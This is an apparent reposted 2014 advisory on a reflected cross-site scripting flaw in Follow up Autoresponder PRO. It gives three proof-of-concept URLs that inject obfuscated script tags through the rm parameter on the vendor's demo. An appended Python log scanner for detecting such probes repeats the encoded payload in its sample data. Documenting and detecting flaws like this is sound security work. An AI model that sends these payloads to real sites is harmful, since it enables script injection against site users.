Autoresponder PRO Cross Site Scripting

2014.01.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Author: TUNISIAN CYBER
[+] Exploit Title: Follow up Autoresponder PRO Cross Site Scripting vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: KaliLinux
[+] Vendor: http://www.scripts4webmasters.com/
[+] Friendly Sites: na3il.com,th3-creative.com
###############################################################
+Description:
Web based php/mysql email list management software where you can get subscriber names, email addresses to do contact management email marketing.
+Exploit:
Follow up Autoresponder PRO suffers from a Cross Site Scripting vulnerability
+PoC:(Tested on Demo)
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(986987)</ScRiPt>
http://www.scripts4webmasters.com/arppro-demo/?rm=license'%22()%26%25<ScRiPt%20>prompt(941203)</ScRiPt>
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(918540)</ScRiPt>
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members: DamaneDz UzunDz GEOIX
########################################################################################
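For defenders checking whether the `rm` parameter has been probed this way, the following is an added example, not part of the original advisory or the vendor's code: it scans access-log lines and flags any `rm` value that is not a plain identifier, decoding percent-encoding twice so mixed-case and double-encoded markup is still caught. The combined log format, the identifier allowlist and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate rm values are plain identifiers, like the
# send_login_info and license values seen in the advisory's URLs.
RM_OK = re.compile(r"[A-Za-z0-9_]{1,64}")
# Request field of a combined-format access log (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>\"'()]|script", re.IGNORECASE)

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jan/2014:10:00:01 +0000] '
    '"GET /arppro-demo/?rm=license HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Jan/2014:10:00:05 +0000] '
    '"GET /arppro-demo/?rm=send_login_info%27%22()%26%25%3CScRiPt%20%3Eprompt(1)%3C/ScRiPt%3E HTTP/1.1" 200 5342',
    '203.0.113.9 - - [09/Jan/2014:10:00:09 +0000] '
    '"GET /arppro-demo/?rm=license%253Cscript%253E HTTP/1.1" 200 5300',
    '198.51.100.4 - - [09/Jan/2014:10:01:00 +0000] '
    '"GET /arppro-demo/?rm=send%20login HTTP/1.1" 200 5100',
]


def rm_values(target):
    """Return the decoded rm parameter values from a request target."""
    query = urlsplit(target).query
    # parse_qs splits on raw '&' first, so an encoded %26 stays in the value.
    values = parse_qs(query, keep_blank_values=True).get("rm", [])
    # Second decode normalises double-encoded input such as %253C.
    return [unquote(v) for v in values]


def scan(lines):
    """Return (line_no, rm_value, reason) for each suspicious rm value."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        for value in rm_values(m.group(1)):
            if RM_OK.fullmatch(value):
                continue  # plain identifier, nothing to report
            reason = "markup" if MARKUP.search(value) else "not-an-identifier"
            findings.append((no, value, reason))
    return findings


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The same allowlist check, applied server-side before the `rm` value is used or echoed, together with HTML-escaping on output, is the corresponding mitigation for CWE-79.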


Copyright 2021, cxsecurity.com

 
